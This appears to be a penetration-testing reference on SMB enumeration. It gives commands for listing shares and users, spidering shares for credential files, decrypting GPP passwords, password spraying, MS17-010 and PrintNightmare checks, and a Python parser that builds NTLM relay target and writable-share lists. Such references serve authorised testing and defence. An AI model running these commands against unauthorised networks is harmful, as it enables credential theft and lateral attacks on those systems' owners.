SMB Enumeration
SMB (Server Message Block) on TCP 445 (and 139 for SMB over NetBIOS) is a goldmine for internal enumeration: share permissions, user and group lists, the domain password policy, and sensitive files left on shares. Start with a null session, then repeat everything with any credentials you obtain, since most of what follows is only visible to an authenticated user.
Share Enumeration
Null Session Enumeration
```bash
# smbclient - list shares (null session)
smbclient -L //TARGET -N
# smbmap - null session
smbmap -H TARGET
# nxc - null session
nxc smb TARGET -u '' -p '' --shares
# enum4linux-ng - comprehensive null session
enum4linux-ng -A TARGET
# Null sessions are disabled by default on current Windows; an anonymous listing that
# works is a finding in itself, so note it even if the shares look empty
```
Authenticated Enumeration
```bash
# smbclient with credentials (DOMAIN/user or DOMAIN\user; omit the domain for a local account)
smbclient -L //TARGET -U 'domain/user%password'
# smbmap authenticated
smbmap -H TARGET -u user -p password
smbmap -H TARGET -u user -p password -d domain
# nxc authenticated (add --local-auth for a local, non-domain account)
nxc smb TARGET -u user -p password --shares
# enum4linux-ng authenticated
enum4linux-ng -u user -p password -A TARGET
```
Connecting to Shares
```bash
# Interactive connection
smbclient //TARGET/share -U 'user%password'
# Useful smbclient commands
smb: \> dir
smb: \> cd directory
smb: \> get filename
smb: \> mget *            # files in the current directory only, prompting for each one
# Pull the whole share recursively without prompts
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
# Mount share locally
sudo mount -t cifs //TARGET/share /mnt/share -o user=user,password=pass
sudo mount -t cifs //TARGET/share /mnt/share -o user=user,password=pass,domain=DOMAIN
# password= on the command line lands in shell history and ps output; prefer a mode-600
# credentials file with username=/password=/domain= lines and -o credentials=/path/to/file
```
Deep Share Enumeration
smbmap Deep Dive
```bash
# Recursive listing of one share, limited to 5 levels
smbmap -H TARGET -u user -p pass -r share --depth 5
# Auto-download files whose name matches a regex (-A needs -R or -r; case-insensitive)
smbmap -H TARGET -u user -p pass -R -A '\.(config|xml|txt|ini|bak)$'
# Same mechanism keyed on suggestive names; matches are downloaded, not just listed
smbmap -H TARGET -u user -p pass -R -A 'password|credential|secret'
# List all readable files recursively across every share
smbmap -H TARGET -u user -p pass -R
```
nxc Spider
```bash
# Spider shares for files (lists everything reachable and writes a JSON report)
nxc smb TARGET -u user -p pass -M spider_plus
# Skip noisy directories (EXCLUDE_DIR is an exclusion filter, not a search pattern)
nxc smb TARGET -u user -p pass -M spider_plus -o EXCLUDE_DIR=Windows,ProgramData
# Choose where the report/downloads are written
nxc smb TARGET -u user -p pass -M spider_plus -o OUTPUT=/tmp/spider.json
# Module option names changed between CrackMapExec and current nxc releases; confirm
# them with `-M spider_plus --options` before relying on the two -o lines above
```
User & Group Enumeration
enum4linux-ng
```bash
# Full enumeration
enum4linux-ng -A TARGET
# Users only
enum4linux-ng -U TARGET
# Groups only
enum4linux-ng -G TARGET
# Shares only
enum4linux-ng -S TARGET
# Password policy
enum4linux-ng -P TARGET
# RID cycling (enumerate users via RID brute force)
enum4linux-ng -R TARGET
```
rpcclient
```bash
# Connect with credentials
rpcclient -U 'user%password' TARGET
# Null session
rpcclient -U '' -N TARGET
# Interactive commands
rpcclient $> enumdomusers
rpcclient $> enumdomgroups
rpcclient $> queryuser 500                 # by RID (500 = built-in Administrator)
rpcclient $> queryuser administrator       # or by name
rpcclient $> querygroupmem 512             # takes a group RID, not a name; 512 = Domain Admins
rpcclient $> getdompwinfo                  # password policy (min length, history, lockout)
rpcclient $> lsaenumsid
rpcclient $> lookupnames administrator     # name -> SID; the RID is the last component
```
Impacket Tools
```bash
# samrdump - dump SAM/domain info (users, groups, password policy) over MSRPC
samrdump.py domain/user:password@TARGET
# lookupsid - enumerate users and groups by brute-forcing RIDs (default ceiling: 4000)
lookupsid.py domain/user:password@TARGET
# Raise the RID ceiling for larger domains (second positional argument)
lookupsid.py domain/user:password@TARGET 20000
```
Sensitive File Hunting
High-Value Targets
```text
# Files to look for:
web.config           # ASP.NET config with connection strings
*.config             # Various app configs
unattend.xml         # Windows deployment answers
sysprep.xml          # Sysprep answers (may contain creds)
Groups.xml           # GPP passwords (SYSVOL); cpassword also appears in Services.xml,
                     # ScheduledTasks.xml, DataSources.xml, Printers.xml and Drives.xml
*.kdbx               # KeePass databases
*.key, *.pem         # SSH/SSL keys
id_rsa               # SSH private keys
.git/                # Git repositories
.svn/                # SVN repositories
*.bak, *.old         # Backup files
passwords.txt        # Self-explanatory
credentials.xml      # Jenkins credentials
*.sql                # Database dumps
*.mdb, *.accdb       # Access databases
```
GPP Password Extraction
```bash
# Check SYSVOL for Groups.xml (GPP passwords); every domain user can read SYSVOL
smbclient //DC/SYSVOL -U 'user%pass' -c 'recurse;ls' | grep -i groups.xml
# Download matching files (-A is a regex; widen it to catch the other GPP XML types)
smbmap -H DC -u user -p pass -R SYSVOL -A Groups.xml
# Decrypt GPP password (the AES key is public, published by Microsoft in MS-GPPREF)
gpp-decrypt "encrypted_password_here"
# Automated with nxc
nxc smb DC -u user -p pass -M gpp_password
# MS14-025 stopped Windows from writing new cpassword entries but did not remove
# existing ones, so old policies still yield working credentials
```
SMB Vulnerabilities
SMB Signing Check
```bash
# Check SMB signing (NTLM relay needs a target that does NOT require signing)
nxc smb TARGET --gen-relay-list relay.txt     # writes hosts reporting signing:False
# Nmap script
nmap -p 445 --script smb-security-mode TARGET
# Output shows one of:
#   message_signing: disabled (dangerous, but default)   -> relayable
#   message_signing: supported                           -> relayable (offered, not enforced)
#   message_signing: required                            -> not relayable
# Domain controllers require signing by default; member servers and workstations
# historically did not (Windows 11 24H2 / Server 2025 changed the client default to required)
```
EternalBlue (MS17-010)
```bash
# Check for MS17-010 (both probes are read-only and need SMBv1 enabled on the target)
nmap -p 445 --script smb-vuln-ms17-010 TARGET
# nxc check
nxc smb TARGET -u '' -p '' -M ms17-010
```
PrintNightmare Check
```bash
# Check if Print Spooler is exposed (rpcdump lists the spooler as MS-RPRN)
rpcdump.py TARGET | grep -i 'spooler\|MS-RPRN'
# nxc module (authenticated; a reachable spooler alone does not mean unpatched)
nxc smb TARGET -u user -p pass -M printnightmare
```
Mass SMB Enumeration
```bash
# Enumerate entire subnet
nxc smb 10.10.10.0/24 -u user -p pass --shares
# Find writable shares (Permissions column shows READ,WRITE)
nxc smb 10.10.10.0/24 -u user -p pass --shares | grep -i write
# Password spray across SMB; read the lockout threshold first (--pass-pol) and keep
# attempts per account below it
nxc smb targets.txt -u users.txt -p 'Password123!' --continue-on-success
# Save console output to a file (results also land in the nxc database; see nxcdb)
nxc smb 10.10.10.0/24 -u user -p pass --shares --log shares.log
```
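Two of the checks on this page, finding writable shares and building a relay-target list, come down to reading nxc's per-host output. The parser below is an added example written for this page, not nxc code: it reads saved nxc smb console output, records each host's signing flag from the banner line and the shares the account actually holds READ/WRITE on, then reports the hosts that do not require signing (the same set `--gen-relay-list` writes) and the writable (ip, share) pairs. The SAMPLE text is constructed to mirror nxc's default column layout; it is not a real capture, and the hostnames, addresses and password in it are placeholders.

```python
"""Turn saved nxc smb console output into a relay-target list and a writable-share list."""
import re

# One nxc line: protocol, ip, port, hostname, then the message or table row.
LINE_RE = re.compile(r"^SMB\s+(\S+)\s+(\d+)\s+(\S+)\s+(.*?)\s*$")
SIGNING_RE = re.compile(r"\(signing:(True|False)\)")
# Share rows the account can use: name, then READ / WRITE / READ,WRITE in the Permissions column.
SHARE_RE = re.compile(r"^(\S+)\s+(READ,WRITE|READ|WRITE)(?:\s|$)")


def parse_nxc(text):
    """Return {ip: {"name": hostname, "signing": True/False/None, "shares": {share: set(perms)}}}.
    signing True means the host requires SMB signing (nxc's banner field). Shares the
    account cannot access have an empty Permissions column and are deliberately skipped."""
    hosts = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, _port, name, rest = m.groups()
        host = hosts.setdefault(ip, {"name": name, "signing": None, "shares": {}})
        sig = SIGNING_RE.search(rest)
        if sig:
            host["signing"] = sig.group(1) == "True"
            continue
        share = SHARE_RE.match(rest)
        if share:
            host["shares"][share.group(1)] = set(share.group(2).split(","))
    return hosts


def relay_targets(hosts):
    """Hosts that do not require signing: the set --gen-relay-list writes out."""
    return sorted(ip for ip, h in hosts.items() if h["signing"] is False)


def writable_shares(hosts):
    """(ip, share) pairs the account can write to."""
    return sorted((ip, s) for ip, h in hosts.items()
                  for s, perms in h["shares"].items() if "WRITE" in perms)


# Constructed sample laid out like nxc's default console output (not a real capture).
SAMPLE = """\
SMB         10.10.10.5      445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.10.10.20     445    FILES01          [*] Windows Server 2016 Build 14393 x64 (name:FILES01) (domain:corp.local) (signing:False) (SMBv1:True)
SMB         10.10.10.5      445    DC01             [+] corp.local\\jdoe:Passw0rd!
SMB         10.10.10.20     445    FILES01          [+] corp.local\\jdoe:Passw0rd!
SMB         10.10.10.5      445    DC01             [*] Enumerated shares
SMB         10.10.10.5      445    DC01             Share           Permissions     Remark
SMB         10.10.10.5      445    DC01             -----           -----------     ------
SMB         10.10.10.5      445    DC01             ADMIN$                          Remote Admin
SMB         10.10.10.5      445    DC01             NETLOGON        READ            Logon server share
SMB         10.10.10.5      445    DC01             SYSVOL          READ            Logon server share
SMB         10.10.10.20     445    FILES01          [*] Enumerated shares
SMB         10.10.10.20     445    FILES01          Share           Permissions     Remark
SMB         10.10.10.20     445    FILES01          -----           -----------     ------
SMB         10.10.10.20     445    FILES01          Public          READ,WRITE
SMB         10.10.10.20     445    FILES01          IT              READ            Helpdesk tools
"""

if __name__ == "__main__":
    hosts = parse_nxc(SAMPLE)
    print("relay targets:", relay_targets(hosts))
    print("writable shares:", writable_shares(hosts))
```

Run it over the file produced with `--log`; the relay list is what you would feed to ntlmrelayx with `-tf`, and the writable-share list is where dropped files (or a coerced-auth .scf/.lnk) can go. Header, separator and status lines are rejected by SHARE_RE because their second column is never a READ/WRITE token.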
Quick Reference
| Task | Tool | Command |
|---|---|---|
| List shares | smbmap | smbmap -H TARGET -u user -p pass |
| Full enum | enum4linux-ng | enum4linux-ng -A TARGET |
| Spider files | nxc | nxc smb TARGET -u user -p pass -M spider_plus |
| GPP passwords | nxc | nxc smb DC -u user -p pass -M gpp_password |
| Signing check | nxc | nxc smb TARGET --gen-relay-list relay.txt |